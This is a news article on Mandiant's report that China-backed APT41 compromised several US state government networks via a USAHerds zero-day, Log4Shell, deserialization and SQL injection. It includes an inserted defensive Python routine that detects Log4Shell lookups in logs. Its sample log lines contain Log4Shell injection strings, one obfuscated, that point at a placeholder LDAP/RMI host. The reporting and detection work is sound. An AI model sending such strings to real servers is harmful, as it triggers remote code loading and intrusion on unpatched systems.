
China-backed hackers compromised six US government networks

Mandiant researchers investigated APT41 activities between May 2021 and February 2022

Chinese hackers belonging to the state-backed APT41 group compromised at least six US government networks by exploiting vulnerabilities in internet-facing applications. 

The vulnerabilities included a zero-day in the USAHerds application and the Log4Shell flaw in the ubiquitous Java logger Log4j, according to cyber security firm Mandiant, which was this week acquired by Google. The company responded to an APT41 intrusion targeting a US state government computer network in May 2021 and studied the group's activity until February 2022.

APT41 is a prolific Chinese state-sponsored espionage group known for targeting organisations in both the public and private sectors and for conducting financially motivated activity for personal gain.

Although the goals of APT41’s latest campaign remain unknown, Mandiant’s investigations revealed a variety of new techniques and malware variants used by the hackers.

During the period of investigation, Mandiant found that APT41 successfully compromised at least six US state government networks through the exploitation of vulnerable internet-facing web applications, often written in ASP.NET. In most of the compromises, APT41 carried out .NET deserialization attacks, although Mandiant also observed the group exploiting SQL injection and directory traversal vulnerabilities.

In one instance, APT41 gained access through an SQL injection vulnerability in a proprietary web application, but Mandiant detected and contained the activity. However, two weeks later, APT41 re-compromised the network by exploiting a previously unknown zero-day vulnerability in a commercial off-the-shelf (COTS) application, USAHerds.

In two other instances, Mandiant began an investigation at one state agency only to find that APT41 had also compromised a separate, unrelated agency in the same state.

Mandiant added that the hacking group was quick to adapt and use publicly disclosed vulnerabilities to gain initial access into target networks, while also maintaining existing operations.

“On December 10th, 2021, the Apache Foundation released an advisory for a critical remote code execution (RCE) vulnerability in the commonly used logging framework Log4J,” wrote the researchers. “Within hours of the advisory, APT41 began exploiting the vulnerability to later compromise at least two US state governments as well as their more traditional targets in the insurance and telecommunications industries.”
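The Log4Shell exploitation described above begins with an attacker-controlled string reaching a vulnerable Log4j logger, which makes the JNDI lookup pattern visible in web-server request logs. The following detection routine is an added example for defenders, not code from the article or from Mandiant: it collapses the nested Log4j lookup wrappers commonly used to hide the literal keyword and then flags any request containing a JNDI lookup. The log lines, IP addresses and the hostname placeholder.invalid are constructed for the example.

```python
import re

# Constructed Apache-style access log lines (not from the article or any real incident).
# Lines 2 and 3 carry a JNDI lookup; line 3 wraps the keyword in a nested lookup.
SAMPLE_LOG_LINES = [
    '203.0.113.5 - - [11/Dec/2021:03:12:44 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [11/Dec/2021:03:13:01 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://placeholder.invalid/a}"',
    '203.0.113.9 - - [11/Dec/2021:03:14:22 +0000] "GET /?q=${${lower:j}ndi:rmi://placeholder.invalid/b} HTTP/1.1" 200 512 "-" "curl/7.79"',
    '203.0.113.4 - - [11/Dec/2021:03:15:10 +0000] "GET /login HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]

# Log4j lookup wrappers that evaluate to their inner text: ${lower:x}, ${upper:x}
_CASE_WRAPPER = re.compile(r"\$\{(?:lower|upper):([^{}$]*)\}", re.IGNORECASE)
# Default-value syntax ${name:-x} (including the degenerate ${::-x}) also evaluates to x.
_DEFAULT_WRAPPER = re.compile(r"\$\{[^{}$]*:-([^{}$]*)\}")
# The lookup a vulnerable Log4j version would resolve: ${jndi:...}
_JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def normalise_lookup(text: str) -> str:
    """Repeatedly replace innermost case/default wrappers with their literal content.

    The loop runs until a pass changes nothing, so arbitrarily deep nesting is
    flattened; matching is case-insensitive downstream, so ${upper:j} -> 'j' is fine.
    """
    previous = None
    while previous != text:
        previous = text
        text = _CASE_WRAPPER.sub(lambda m: m.group(1), text)
        text = _DEFAULT_WRAPPER.sub(lambda m: m.group(1), text)
    return text


def is_jndi_lookup(line: str) -> bool:
    """True if the line contains a JNDI lookup once wrappers are flattened."""
    return _JNDI_LOOKUP.search(normalise_lookup(line)) is not None


def flag_lines(lines):
    """Return (1-based line number, line) for every line that warrants review."""
    return [(n, line) for n, line in enumerate(lines, start=1) if is_jndi_lookup(line)]


if __name__ == "__main__":
    for number, line in flag_lines(SAMPLE_LOG_LINES):
        print(f"line {number}: {line}")
```

The check looks at the whole log line rather than a single field because the lookup string can arrive in any header or parameter that the application logs; a hit is a reason to review the host, not proof of compromise, since a patched Log4j version simply logs the text without resolving it.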

Mandiant said that in late February 2022, APT41 re-compromised two previous US state government victims. This closely aligns with APT41’s May-December 2021 activity, representing a continuation of their campaign into 2022 and demonstrating their unceasing desire to access state government networks, said the company. 

Mandiant underlined that the goals of the campaign are currently unknown, although it has observed evidence of APT41 exfiltrating personally identifiable information (PII).

“Although the victimology and targeting of PII data is consistent with an espionage operation, Mandiant cannot make a definitive assessment at this time given APT41’s history of moonlighting for personal financial gain,” stated the researchers.

Members of APT41 were charged by the US Department of Justice (DoJ) in September 2020 in connection with computer intrusion campaigns against over 100 victim companies.

The DoJ said the intrusions facilitated the theft of source code, software code-signing certificates, customer account data, and valuable business information. It added that these intrusions facilitated the defendants’ other criminal schemes, such as ransomware and crypto-jacking.
